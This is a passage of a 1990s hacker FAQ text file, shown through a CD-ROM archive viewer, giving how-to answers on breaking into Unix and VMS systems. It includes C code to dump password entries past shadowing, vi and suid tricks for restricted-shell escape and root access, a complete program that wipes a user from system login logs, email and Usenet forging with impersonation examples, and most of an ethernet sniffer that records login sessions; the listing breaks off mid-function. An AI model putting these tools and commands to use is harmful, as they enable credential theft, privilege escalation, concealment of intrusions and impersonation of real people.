home *** CD-ROM | disk | FTP | other *** search
/ Group 42-Sells Out! - The Information Archive / Group 42 Sells Out (Group 42) (1996).iso / hack / hack_faq.txt < prev    next >
Text File  |  1995-11-18  |  74KB  |  2,451 lines

  1.  
  2.                                  ** BETA **
  3.  
  4.                 #Hack F.A.Q.
  5.                     by
  6.                   Voyager
  7.                             will@gnu.ai.mit.edu
  8.  
  9.                           With special thanks to:
  10.  
  11.             A-Flat, Al, Aleph1, Bluesman, C-Curve, Edison, KCrow,
  12.               Major, Presence, Rogue Agent, sbin and TheSaint.
  13.  
  14.                             Beta Revision .006
  15.  
  16.  
  17.  
  18. Section A: Computers
  19.  
  20.   01. How do I access the password file under Unix?
  21.   02. How do I crack Unix passwords?
  22.   03. How do I access the password file under VMS?
  23.   04. How do I crack VMS passwords?
  24.   05. What is NIS/yp?
  25.   06. What is password shadowing?
  26.   07. How do I break out of a restricted shell?
  27.   08. How do I gain root from a suid script or program?
  28.   09. How do I erase my presence from the system logs?
  29.   10. How do I send fakemail?
  30.   11. How do I fake posts to UseNet?
  31.   12. How do I hack ChanOp on IRC?
  32.   13. How do I modify the IRC client to hide my real username?
  33.   14. What is a trojan/worm/virus/logic bomb?
  34. U 15. How can I protect myself from virii and such?
  35.   16. What is Cryptoxxxxxxx?
  36.   17. What is PGP?
  37.   18. What is Tempest?
  38. N 19. How to I change to directores with strange characters in them?
  39. N 20. What is ethernet sniffing?
  40. N 21. What is an Internet Outdial?
  41. N 22. What are some Internet Outdials?
  42.  
  43.  
  44. Section B: Telephony
  45.  
  46. U 01. What is a Red Box?
  47.   02. How do I build a Red Box?
  48.   03. Which payphones will a Red Box work on?
  49.   04. What is a Blue Box?
  50.   05. Do Blue Boxes still work?
  51.   06. What is a Black Box?
  52.   07. What do all the colored boxes do?
  53. U 08. What is the ANAC number for my area?
  54.   09. What is a ringback number?
  55. U 10. What is the ringback number for my area?
  56. U 11. What is a loop?
  57.   12. What is a loop in my area?
  58.   13. What is a CNA number?
  59.   14. What is the telephone company CNA number for my area?
  60.   15. What is scanning?
  61.   16. Is scanning illegal?
  62.  
  63.  
  64. Section C: Resources
  65.  
  66. U 01. What are some ftp sites of interest to hackers?
  67. U 02. What are some newsgroups of interest to hackers?
  68.   03. What are some telnet sites of interest to hackers?
  69. U 04. What are some gopher sites of interest to hackers?
  70. U 05. What are some World wide Web (WWW) sites of interest to hackers?
  71.   06. What are some IRC channels of interest to hackers?
  72. U 07. What are some BBS's of interest to hackers?
  73. U 08. What books are available on this subject?
  74.  
  75. Section D: Miscellaneous
  76.  
  77.   01. What does XXX stand for?
  78. N 02. Where can I get a copy of the #hack FAQ?
  79.  
  80.  
  81. U == Updated since last release of the #hack FAQ
  82. A == Added since last release of the #hack FAQ
  83.  
  84. Section A: Computers
  85. ~~~~~~~~~~~~~~~~~~~~
  86.  
  87. 01. How do I access the password file under Unix?
  88.  
  89. In standard Unix the password file is /etc/passwd.  On a Unix system
  90. with either NIS/yp or password shadowing, much of the password data
  91. may be elsewhere.
  92.  
  93.  
  94. 02. How do I crack Unix passwords?
  95.  
  96. Contrary to popular belief, Unix passwords cannot be decrypted.  Unix
  97. passwords are encrypted with a one way function.  The login program
  98. encrypts the text you enter at the "password:" prompt and compares
  99. that encrypted string against the encrypted form of your password.
  100.  
  101. Password cracking software uses wordlists.  Each word in the wordlist
  102. is encrypted with each of the 4096 possible salt values and the
  103. results are compared to the encrypted form of the target password.
  104.  
  105. The best cracking program for Unix passwords is currently Crack by
  106. Alec Muffett.  For PC-DOS, the best package to use is currently
  107. CrackerJack.
  108.  
  109.  
  110. 03. How do I access the password file under VMS?
  111.  
  112. Under VMS, the password file is SYS$SYSTEM:SYSUAF.DAT.  However,
  113. unlike Unix, most users do not have access to read the password file.
  114.  
  115.  
  116. 04. How do I crack VMS passwords?
  117.  
  118. Write a program that uses the SYS$GETUAF functions to compare the
  119. results of encrypted words against the encrypted data in SYSUAF.DAT.
  120.  
  121. Two such programs are known to exist, CHECK_PASSWORD and
  122. GUESS_PASSWORD.
  123.  
  124.  
  125. 05. What is NIS/yp?
  126.  
  127. NIS (Network Information System) in the current name for what was once
  128. known as yp (Yellow Pages).  The purpose for NIS is to allow many
  129. machies on a network to share configuration information, including
  130. password data. NIS is not designed to promote system security.  If
  131. your system uses NIS you will have a very short /etc/passwd file with
  132. a line that looks like this:
  133.  
  134. +::0:0:::
  135.  
  136. To view the real password file use this command "ypcat passwd"
  137.  
  138.  
  139. 06. What is password shadowing?
  140.  
  141. Password shadowing is a security system where the encrypted password
  142. field of /etc/password is replaced with a special token and the
  143. encrypted password is stored in a seperate file which is not readable
  144. by normal system users.
  145.  
  146. To defeat password shadowing on many (but not all) systems, write a
  147. program that uses successive calls to getpwent() to obtain the
  148. password file.
  149.  
  150. Example:
  151.  
  152. #include <pwd.h>
  153. main()
  154. {
  155. struct passwd *p;
  156. while(p=getpwent())
  157. printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
  158. p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
  159. }
  160.  
  161.  
  162. 07. How do I break out of a restricted shell?
  163.  
  164. On poorly implemented restricted shells you can break out of the
  165. restricted environment by running a program that features a shell
  166. function.  A good example is vi.  Run vi and use this command:
  167.  
  168. :set shell=/bin/sh
  169.  
  170. then shell using this command:
  171.  
  172. :shell
  173.  
  174.  
  175. 08. How do I gain root from a suid script or program?
  176.  
  177. 1. Change IFS.
  178.  
  179. If the program calls any other programs using the system() function
  180. call, you may be able to fool it by changing IFS.  IFS is the Internal
  181. Field Seperator that the shell uses to delimit arguments.
  182.  
  183. If the program contains a line that looks like this:
  184.  
  185. system("/bin/date")
  186.  
  187. and you change IFS to '/' the shell will them interpret the
  188. proceeding line as:
  189.  
  190. bin date
  191.  
  192. Now, if you have a program of your own in the path called "bin" the
  193. suid program will run your program instead of /bin/date.
  194.  
  195. To change IFS, use this command:
  196.  
  197. set IFS '/'
  198.  
  199.  
  200. 2. link the script to -i
  201.  
  202. Create a symbolic link named "-i" to the program.  Running "-i"
  203. will cause the interpreter shell (/bin/sh) to start up in interactive
  204. mode.  This only works on suid shell scripts.
  205.  
  206. Example:
  207.  
  208. % ln suid.sh -i
  209. % -i
  210. #
  211.  
  212.  
  213. 3. Exploit a race condition
  214.  
  215. Replace a symbolic link to the program with another program while the
  216. kernel is loading /bin/sh.
  217.  
  218. Example:
  219.  
  220. nice -19 suidprog ; ln -s evilprog suidroot
  221.  
  222.  
  223. 4. Send bad input the the program.
  224.  
  225. Invoke the name of the program and a seperate command on the same
  226. command line.
  227.  
  228. Example:
  229.  
  230. suidprog ; id
  231.  
  232.  
  233. 09. How do I erase my presence from the system logs?
  234.  
  235. Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text
  236. files that can be edited by hand with vi, you must use a program
  237. specifically written for this purpose.
  238.  
  239. Example:
  240.  
  241. #include <sys/types.h>
  242. #include <stdio.h>
  243. #include <unistd.h>
  244. #include <sys/file.h>
  245. #include <fcntl.h>
  246. #include <utmp.h>
  247. #include <pwd.h>
  248. #include <lastlog.h>
  249. #define WTMP_NAME "/usr/adm/wtmp"
  250. #define UTMP_NAME "/etc/utmp"
  251. #define LASTLOG_NAME "/usr/adm/lastlog"
  252.  
  253. int f;
  254.  
  255. void kill_utmp(who)
  256. char *who;
  257. {
  258.     struct utmp utmp_ent;
  259.  
  260.   if ((f=open(UTMP_NAME,O_RDWR))>=0) {
  261.      while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
  262.        if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
  263.                  bzero((char *)&utmp_ent,sizeof( utmp_ent ));
  264.                  lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
  265.                  write (f, &utmp_ent, sizeof (utmp_ent));
  266.             }
  267.      close(f);
  268.   }
  269. }
  270.  
  271. void kill_wtmp(who)
  272. char *who;
  273. {
  274.     struct utmp utmp_ent;
  275.     long pos;
  276.  
  277.     pos = 1L;
  278.     if ((f=open(WTMP_NAME,O_RDWR))>=0) {
  279.  
  280.      while(pos != -1L) {
  281.         lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
  282.         if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
  283.           pos = -1L;
  284.         } else {
  285.           if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
  286.                bzero((char *)&utmp_ent,sizeof(struct utmp ));
  287.                lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
  288.                write (f, &utmp_ent, sizeof (utmp_ent));
  289.                pos = -1L;
  290.           } else pos += 1L;
  291.         }
  292.      }
  293.      close(f);
  294.   }
  295. }
  296.  
  297. void kill_lastlog(who)
  298. char *who;
  299. {
  300.     struct passwd *pwd;
  301.     struct lastlog newll;
  302.  
  303.      if ((pwd=getpwnam(who))!=NULL) {
  304.  
  305.         if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
  306.             lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
  307.             bzero((char *)&newll,sizeof( newll ));
  308.             write(f, (char *)&newll, sizeof( newll ));
  309.             close(f);
  310.         }
  311.  
  312.     } else printf("%s: ?\n",who);
  313. }
  314.  
  315. main(argc,argv)
  316. int argc;
  317. char *argv[];
  318. {
  319.     if (argc==2) {
  320.         kill_lastlog(argv[1]);
  321.         kill_wtmp(argv[1]);
  322.         kill_utmp(argv[1]);
  323.         printf("Zap2!\n");
  324.     } else
  325.     printf("Error.\n");
  326. }
  327.  
  328.  
  329. 10. How do I send fakemail?
  330.  
  331. Telnet to port 25 of the machine you want the mail to appear to
  332. originate from.  Enter your message as in this example:
  333.  
  334.  HELO bellcore.com
  335.  MAIL FROM:Voyagor@bellcore.com
  336.  RCPT TO:clinton@whitehouse.gov
  337.  DATA
  338.  
  339.     Please discontinue your silly Clipper initiative.
  340.  .
  341.  QUIT
  342.  
  343. On systems that have RFC 931 implemented, spoofing your "MAIL FROM:"
  344. line will not work.  Test by sending yourself fakemail first.
  345.  
  346.  
  347. 11. How do I fake posts to UseNet?
  348.  
  349. Use inews to post.  Give inews the following lines:
  350.  
  351. From:
  352. Newsgroups:
  353. Subject:
  354. Message-ID:
  355. Date:
  356. Organization:
  357.  
  358. For a moderated newsgroup, inews will also require this line:
  359.  
  360. Approved:
  361.  
  362. Then add your post and terminate with <Control-D>.
  363.  
  364. Example:
  365.  
  366. From: Dale Drew
  367. Newsgroups: alt.2600
  368. Subject: Please forgive me
  369. Message-ID: <d_drew.123@tymnet.com>
  370. Date: Fri, 13 Jun 1994 12:15:03
  371. Organization: Tymnet Insecurity
  372.  
  373. Please forgive me for being such a worthless puke all of these years.
  374.  
  375.                                                 Sincerely,
  376.  
  377.                                                         Bartman
  378. ^D
  379.  
  380.  
  381. 12. How do I hack ChanOp on IRC?
  382.  
  383. Find a server that is split from the rest of IRC and create your own
  384. channel there using the name of the channel you want ChanOp on.  When
  385. that server reconnects to the net, you will have ChanOp on the real
  386. channel.  If you have ServerOp on a server, you can cause it to split
  387. on purpose.
  388.  
  389.  
  390. 13. How do I modify the IRC client to hide my real username?
  391.  
  392. Get the IRC client from cs.bu.edu /irc/clients.  Look at the source
  393. code files irc.c and ctcp.c.  The code you are looking for is fairly
  394. easy to spot.  Change it. Change the username code in irc.c and the
  395. ctcp information code in ctcp.c.  Compile and run your client.
  396.  
  397. Here are the diffs from a sample hack of the IRC client.  Your client
  398. code will vary slighty depending on what IRC client version you are
  399. running.
  400.  
  401. *** ctcp.c.old  Wed Feb 10 10:08:05 1993
  402. --- ctcp.c    Fri Feb 12 04:33:55 1993
  403. ***************
  404. *** 331,337 ****
  405.       struct    passwd    *pwd;
  406.       long    diff;
  407.       int    uid;
  408. !     char    c;
  409.   
  410.       /*
  411.        * sojge complained that ircII says 'idle 1 seconds'
  412. --- 331,337 ----
  413.       struct    passwd    *pwd;
  414.       long    diff;
  415.       int    uid;
  416. !     char    c, *fing;
  417.   
  418.       /*
  419.        * sojge complained that ircII says 'idle 1 seconds'
  420. ***************
  421. *** 348,354 ****
  422.       if (uid != DAEMON_UID)
  423.       {
  424.   #endif /* DAEMON_UID */    
  425. !         if (pwd = getpwuid(uid))
  426.           {
  427.               char    *tmp;
  428.   
  429. --- 348,356 ----
  430.       if (uid != DAEMON_UID)
  431.       {
  432.   #endif /* DAEMON_UID */    
  433. !         if (fing = getenv("IRCFINGER"))
  434. !             send_ctcp_reply(from, ctcp->name, fing, diff, c);
  435. !         else if (pwd = getpwuid(uid))
  436.           {
  437.               char    *tmp;
  438.   
  439. *** irc.c.old    Wed Feb 10 06:33:11 1993
  440. --- irc.c    Fri Feb 12 04:02:11 1993
  441. ***************
  442. *** 510,516 ****
  443.           malloc_strcpy(&my_path, "/");
  444.       if (*realname == null(char))
  445.           strmcpy(realname, "*Unknown*", REALNAME_LEN);
  446. !     if (*username == null(char))
  447.       {
  448.           if (ptr = getenv("USER"))
  449.               strmcpy(username, ptr, NAME_LEN);
  450. --- 510,518 ----
  451.           malloc_strcpy(&my_path, "/");
  452.       if (*realname == null(char))
  453.           strmcpy(realname, "*Unknown*", REALNAME_LEN);
  454. !     if (ptr = getenv("IRCUSER"))
  455. !         strmcpy(username, ptr, NAME_LEN);
  456. !     else if (*username == null(char))
  457.       {
  458.           if (ptr = getenv("USER"))
  459.               strmcpy(username, ptr, NAME_LEN);
  460.  
  461.  
  462. 14. What is a trojan/worm/virus/logic bomb?
  463.  
  464. This FAQ answer is excerpted from: Computer Security Basics
  465.                                    by Deborah Russell
  466.                                    and G.T. Gengemi Sr.
  467.  
  468. Trojan:     An independent program that appears to perform a useful
  469.             function but that hides another unauthorized program
  470.             inside it.  When an authorized user performs the apparrent
  471.             function, the trojan horse performs the unauthorized
  472.             function as well (often usurping the priveleges of the
  473.             user).
  474.  
  475. Virus:      A code fragment (not an independent program) that
  476.             reproduces by attaching to another program.  It may damage
  477.             data directly, or it may degrade system performance by
  478.             taking over system resources which are then not available
  479.             to authorized users.
  480.  
  481. Worm:       An independent program that reproduces by copying itself
  482.             from one system to another, usually over a network.  Like
  483.             a virus, a worm may damage data directly, or it may
  484.             degrade system performace by tying up system resources and
  485.             even shutting down a network.
  486.  
  487. Logic Bomb: A method for releasing a system attack of some kind.  It
  488.             is triggered when a particular condition (e.g., a certain
  489.             date or system operation) occurs.
  490.  
  491.  
  492. 15. How can I protect myself from virii and such?
  493.  
  494. Always write protect your floppy disks when you are not purposefully
  495. writing to them.
  496.  
  497. Use ATTRIB to make all of your EXE and COM files read only.  This will
  498. protect you from many poorly written viruses.
  499.  
  500. Scan any software that you receive with a recent copy of a good virus
  501. scanner.  The best virus scanner currently available for DOS is F-Prot
  502. by Fridrik Skulason.  The current version is FP-212C.  It is best to
  503. use more than one virus scanner.  That will decrease your chances of
  504. missing a virus.
  505.  
  506. Backup regularly, and keep several generations of backups on hand.
  507. If you always backup over your last backup, you may find yourself with
  508. an infected backup tape.
  509.  
  510.  
  511. 16. What is Cryptoxxxxxxx?
  512.  
  513. This FAQ answer is excerpted from: Computer Security Basics
  514.                                    by Deborah Russell
  515.                                    and G.T. Gengemi Sr.
  516.  
  517. A message is called either plaintext or cleartext.  The process of
  518. disguising a message in such a way as to hide its substance is called
  519. encryption.  An encrypted message is called ciphertext.  The process
  520. of turning ciphertext back into plaintext is called decryption.
  521.  
  522. The art and science of keeping messages secure is called cryptography,
  523. and it is practiced by cryptographers.  Cryptanalysts are
  524. practitioners of cryptanalysis, the art and science of breaking
  525. ciphertext, i.e. seeing through the disguise.  The branch of
  526. mathematics embodying both cryptography and cryptanalysis is called
  527. cryptology, and it's practitioners are called cryptologists.
  528.  
  529.  
  530. 17. What is PGP?
  531.  
  532. This FAQ answer is excerpted from: PGP(tm) User's Guide
  533.                                    Volume I: Essential Topics
  534.                                    by Philip Zimmermann
  535.  
  536. PGP(tm) uses public-key encryption to protect E-mail and data files.
  537. Communicate securely with people you've never met, with no secure
  538. channels needed for prior exchange of keys.  PGP is well featured and
  539. fast, with sophisticated key management, digital signatures, data
  540. compression, and good ergonomic design.
  541.  
  542. Pretty Good(tm) Privacy (PGP), from Phil's Pretty Good Software, is a
  543. high security cryptographic software application for MSDOS, Unix,
  544. VAX/VMS, and other computers.  PGP allows people to exchange files or
  545. messages with privacy, authentication, and convenience.  Privacy means
  546. that only those intended to receive a message can read it.
  547. Authentication means that messages that appear to be from a particular
  548. person can only have originated from that person. Convenience means
  549. that privacy and authentication are provided without the hassles of
  550. managing keys associated with conventional cryptographic software.  No
  551. secure channels are needed to exchange keys between users, which makes
  552. PGP much easier to use.  This is because PGP is based on a powerful
  553. new technology called "public key" cryptography.
  554.  
  555. PGP combines the convenience of the Rivest-Shamir-Adleman (RSA)
  556. public key cryptosystem with the speed of conventional cryptography,
  557. message digests for digital signatures, data compression before
  558. encryption, good ergonomic design, and sophisticated key management. 
  559. And PGP performs the public-key functions faster than most other
  560. software implementations.  PGP is public key cryptography for the
  561. masses.
  562.  
  563.  
  564. 18. What is Tempest?
  565.  
  566. Computers and other electonic equipment release interference to their
  567. surrounding environment.  You may observe this by placing two video
  568. monitors close together.  The pictures will behave erratically until
  569. you space them apart.
  570.  
  571. Although most of the time these emissions are simply annoyances, they
  572. can sometimes be very helpful.  Suppose we wanted to see what project
  573. a target was working on.  We could sit in a van outside her office and
  574. use sensitive electonic equipment to attempt to pick up and decipher
  575. the emanations from her video monitor.
  576.  
  577. Our competetor, however, could shield the emanations from her
  578. equipment or use equipment without strong emanations.
  579.  
  580. Tempest is the US Government program for evaluation and endorsement
  581. of electronic equipment that is safe from eavesdropping.
  582.  
  583.  
  584. 19. How to I change to directores with strange characters in them?
  585.  
  586. These directories are often used by people trying to hide information,
  587. most often warez (commercial software).
  588.  
  589. To change into these directories, you must determine what the special
  590. characters are.  Often an ASCII chart will help.  Another useful tool
  591. is the "dir *" command, which will show you the total length of the
  592. directory name.
  593.  
  594. On an IBM-PC, you may enter these special characters by holding down
  595. the <ALT> key and entering the decimal value of the special character
  596. on your numeric keypad.  When you release the <ALT> key, the special
  597. character should appear on your screen.
  598.  
  599. If the directory name includes a <SPACE> or a <TAB> you will need to
  600. enclose the entire directory name in quotes.  Example:
  601.  
  602. cd "..<TAB>"
  603.  
  604.  
  605. N 20. What is ethernet sniffing?
  606.  
  607. Ethernet sniffing is listening (with software) to the raw ethernet
  608. device for packets that interest you.  When your software sees a
  609. packet that fits certain criteria, it logs it to a file.  The most
  610. common criteria for an interesting packet is one that contains words
  611. like "login" or "password."
  612.  
  613. Many enternet sniffers are available, here are a few that may be on
  614. your system now:
  615.  
  616. OS              Sniffer
  617. ~~              ~~~~~~~
  618. HP/UX           nettl (monitor) & netfmt (display)
  619. SunOS           etherfind
  620. Solaris         snoop
  621. DOS             ETHLOAD
  622.                 LanWatch
  623.                 The Gobbler
  624.                 Netmon
  625.                 LanPatrol
  626.                 Netwatch
  627.  
  628. Here is source code for an ethernet sniffer:
  629.  
  630. /* Esniff.c */
  631.  
  632. #include <stdio.h>
  633. #include <ctype.h>
  634. #include <string.h>
  635.  
  636. #include <sys/time.h>
  637. #include <sys/file.h>
  638. #include <sys/stropts.h>
  639. #include <sys/signal.h>
  640. #include <sys/types.h>
  641. #include <sys/socket.h>
  642. #include <sys/ioctl.h>
  643.  
  644. #include <net/if.h>
  645. #include <net/nit_if.h>
  646. #include <net/nit_buf.h>
  647. #include <net/if_arp.h>
  648.  
  649. #include <netinet/in.h>
  650. #include <netinet/if_ether.h>
  651. #include <netinet/in_systm.h>
  652. #include <netinet/ip.h>
  653. #include <netinet/udp.h>
  654. #include <netinet/ip_var.h>
  655. #include <netinet/udp_var.h>
  656. #include <netinet/in_systm.h>
  657. #include <netinet/tcp.h>
  658. #include <netinet/ip_icmp.h>
  659.  
  660. #include <netdb.h>
  661. #include <arpa/inet.h>
  662.  
  663. #define ERR stderr
  664.  
  665. char    *malloc();
  666. char    *device,
  667.         *ProgName,
  668.         *LogName;
  669. FILE    *LOG;
  670. int     debug=0;
  671.  
  672. #define NIT_DEV     "/dev/nit"
  673. #define CHUNKSIZE   4096        /* device buffer size */
  674. int     if_fd = -1;
  675. int     Packet[CHUNKSIZE+32];
  676.  
  677. void Pexit(err,msg)
  678. int err; char *msg;
  679. { perror(msg);
  680.   exit(err); }
  681.  
  682. void Zexit(err,msg)
  683. int err; char *msg;
  684. { fprintf(ERR,msg);
  685.   exit(err); }
  686.  
  687. #define IP          ((struct ip *)Packet)
  688. #define IP_OFFSET   (0x1FFF)
  689. #define SZETH       (sizeof(struct ether_header))
  690. #define IPLEN       (ntohs(ip->ip_len))
  691. #define IPHLEN      (ip->ip_hl)
  692. #define TCPOFF      (tcph->th_off)
  693. #define IPS         (ip->ip_src)
  694. #define IPD         (ip->ip_dst)
  695. #define TCPS        (tcph->th_sport)
  696. #define TCPD        (tcph->th_dport)
  697. #define IPeq(s,t)   ((s).s_addr == (t).s_addr)
  698.  
  699. #define TCPFL(FLAGS) (tcph->th_flags & (FLAGS))
  700.  
  701. #define MAXBUFLEN  (128)
  702. time_t  LastTIME = 0;
  703.  
  704. struct CREC {
  705.      struct CREC *Next,
  706.                  *Last;
  707.      time_t  Time;              /* start time */
  708.      struct in_addr SRCip,
  709.                     DSTip;
  710.      u_int   SRCport,           /* src/dst ports */
  711.              DSTport;
  712.      u_char  Data[MAXBUFLEN+2]; /* important stuff :-) */
  713.      u_int   Length;            /* current data length */
  714.      u_int   PKcnt;             /* # pkts */
  715.      u_long  LASTseq;
  716. };
  717.  
  718. struct CREC *CLroot = NULL;
  719.  
  720. char *Symaddr(ip)
  721. register struct in_addr ip;
  722. { register struct hostent *he =
  723.       gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET);
  724.  
  725.   return( (he)?(he->h_name):(inet_ntoa(ip)) );
  726. }
  727.  
  728. char *TCPflags(flgs)
  729. register u_char flgs;
  730. { static char iobuf[8];
  731. #define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-')
  732.  
  733.   SFL(0,TH_FIN, 'F');
  734.   SFL(1,TH_SYN, 'S');
  735.   SFL(2,TH_RST, 'R');
  736.   SFL(3,TH_PUSH,'P');
  737.   SFL(4,TH_ACK, 'A');
  738.   SFL(5,TH_URG, 'U');
  739.   iobuf[6]=0;
  740.   return(iobuf);
  741. }
  742.  
  743. char *SERVp(port)
  744. register u_int port;
  745. { static char buf[10];
  746.   register char *p;
  747.  
  748.    switch(port) {
  749.      case IPPORT_LOGINSERVER: p="rlogin"; break;
  750.      case IPPORT_TELNET:      p="telnet"; break;
  751.      case IPPORT_SMTP:        p="smtp"; break;
  752.      case IPPORT_FTP:         p="ftp"; break;
  753.      default: sprintf(buf,"%u",port); p=buf; break;
  754.    }
  755.    return(p);
  756. }
  757.  
  758. char *Ptm(t)
  759. register time_t *t;
  760. { register char *p = ctime(t);
  761.   p[strlen(p)-6]=0; /* strip " YYYY\n" */
  762.   return(p);
  763. }
  764.  
  765. char *NOWtm()
  766. { time_t tm;
  767.   time(&tm);
  768.   return( Ptm(&tm) );
  769. }
  770.  
  771. #define MAX(a,b) (((a)>(b))?(a):(b))
  772. #define MIN(a,b) (((a)<(b))?(a):(b))
  773.  
  774. /* add an item */
  775. #define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \
  776.   register struct CREC *CLtmp = \
  777.         (struct CREC *)malloc(sizeof(struct CREC)); \
  778.   time( &(CLtmp->Time) ); \
  779.   CLtmp->SRCip.s_addr = SIP.s_addr; \
  780.   CLtmp->DSTip.s_addr = DIP.s_addr; \
  781.   CLtmp->SRCport = SPORT; \
  782.   CLtmp->DSTport = DPORT; \
  783.   CLtmp->Length = MIN(LEN,MAXBUFLEN); \
  784.   bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \
  785.   CLtmp->PKcnt = 1; \
  786.   CLtmp->Next = CLroot; \
  787.   CLtmp->Last = NULL; \
  788.   CLroot = CLtmp; \
  789. }
  790.  
  791. register struct CREC *GET_NODE(Sip,SP,Dip,DP)
  792. register struct in_addr Sip,Dip;
  793. register u_int SP,DP;
  794. { register struct CREC *CLr = CLroot;
  795.  
  796.   while(CLr != NULL) {
  797.     if( (CLr->SRCport == SP) && (CLr->DSTport == DP) &&
  798.         IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) )
  799.             break;
  800.     CLr = CLr->Next;
  801.   }
  802.   return(CLr);
  803. }
  804.  
  805. #define ADDDATA_NODE(CL,DATA,LEN) { \
  806.  bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \
  807.  CL->Length += LEN; \
  808. }
  809.  
  810. #define PR_DATA(dp,ln) {    \
  811.   register u_char lastc=0; \
  812.   while(ln-- >0) { \
  813.      if(*dp < 32) {  \
  814.         switch(*dp) { \
  815.             case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \
  816.                         break; \
  817.             case '\r': \
  818.             case '\n': fprintf(LOG,"\n     : "); \
  819.                         break; \
  820.             default  : fprintf(LOG,"^%c", (*dp + 64)); \
  821.                         break; \
  822.         } \
  823.      } else { \
  824.         if(isprint(*dp)) fputc(*dp,LOG); \
  825.         else fprintf(LOG,"(%d)",*dp); \
  826.      } \
  827.      lastc = *dp++; \
  828.   } \
  829.   fflush(LOG); \
  830. }
  831.  
  832. void END_NODE(CLe,d,dl,msg)
  833. register struct CREC *CLe;
  834. register u_char *d;
  835. register int dl;
  836. register char *msg;
  837. {
  838.    fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time));
  839.    fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport));
  840.    fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport));
  841.    fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n",
  842.                         NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg);
  843.    fprintf(LOG," DATA: ");
  844.     { register u_int i = CLe->Length;
  845.       register u_char *p = CLe->Data;
  846.       PR_DATA(p,i);
  847.       PR_DATA(d,dl);
  848.     }
  849.  
  850.    fprintf(LOG,"\n-- \n");
  851.    fflush(LOG);
  852.  
  853.    if(CLe->Next != NULL)
  854.     CLe->Next->Last = CLe->Last;
  855.    if(CLe->Last != NULL)
  856.     CLe->Last->Next = CLe->Next;
  857.    else
  858.     CLroot = CLe->Next;
  859.    free(CLe);
  860. }
  861.  
  862. /* 30 mins (x 60 seconds) */
  863. #define IDLE_TIMEOUT 1800
  864. #define IDLE_NODE() { \
  865.   time_t tm; \
  866.   time(&tm); \
  867.   if(LastTIME<tm) { \
  868.      register struct CREC *CLe,*CLt = CLroot; \
  869.      LastTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT; \
  870.      while(CLe=CLt) { \
  871.        CLt=CLe->Next; \
  872.        if(CLe->Time <tm) \
  873.            END_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOUT"); \
  874.      } \
  875.   } \
  876. }
  877.  
  878. void filter(cp, pktlen)
  879. register char *cp;
  880. register u_int pktlen;
  881. {
  882.  register struct ip     *ip;
  883.  register struct tcphdr *tcph;
  884.  
  885.  { register u_short EtherType=ntohs(((struct ether_header *)cp)->ether_type);
  886.  
  887.    if(EtherType < 0x600) {
  888.      EtherType = *(u_short *)(cp + SZETH + 6);
  889.      cp+=8; pktlen-=8;
  890.    }
  891.  
  892.    if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */
  893.       return;
  894.  }
  895.  
  896.     /* ugh, gotta do an alignment :-( */
  897.  bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH));
  898.  
  899.  ip = (struct ip *)Packet;
  900.  if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */
  901.     return;
  902.  tcph = (struct tcphdr *)(Packet + IPHLEN);
  903.  
  904.  if(!( (TCPD == IPPORT_TELNET) ||
  905.        (TCPD == IPPORT_LOGINSERVER) ||
  906.        (TCPD == IPPORT_FTP)
  907.    )) return;
  908.  
  909.  { register struct CREC *CLm;
  910.    register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4));
  911.    register u_char *p = (u_char *)Packet;
  912.  
  913.    p += ((IPHLEN * 4) + (TCPOFF * 4));
  914.  
  915.  if(debug) {
  916.   fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length);
  917.   fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS));
  918.   fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD));
  919.  }
  920.  
  921.    if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) {
  922.  
  923.       CLm->PKcnt++;
  924.  
  925.       if(length>0)
  926.         if( (CLm->Length + length) < MAXBUFLEN ) {
  927.           ADDDATA_NODE( CLm, p,length);
  928.         } else {
  929.           END_NODE( CLm, p,length, "DATA LIMIT");
  930.         }
  931.  
  932.       if(TCPFL(TH_FIN|TH_RST)) {
  933.           END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" );
  934.       }
  935.  
  936.    } else {
  937.  
  938.       if(TCPFL(TH_SYN)) {
  939.          ADD_NODE(IPS,IPD,TCPS,TCPD,p,length);
  940.       }
  941.  
  942.    }
  943.  
  944.    IDLE_NODE();
  945.  
  946.  }
  947.  
  948. }
  949.  
  950. /* signal handler
  951.  */
  952. void death()
  953. { register struct CREC *CLe;
  954.  
  955.     while(CLe=CLroot)
  956.         END_NODE( CLe, (u_char *)NULL,0, "SIGNAL");
  957.  
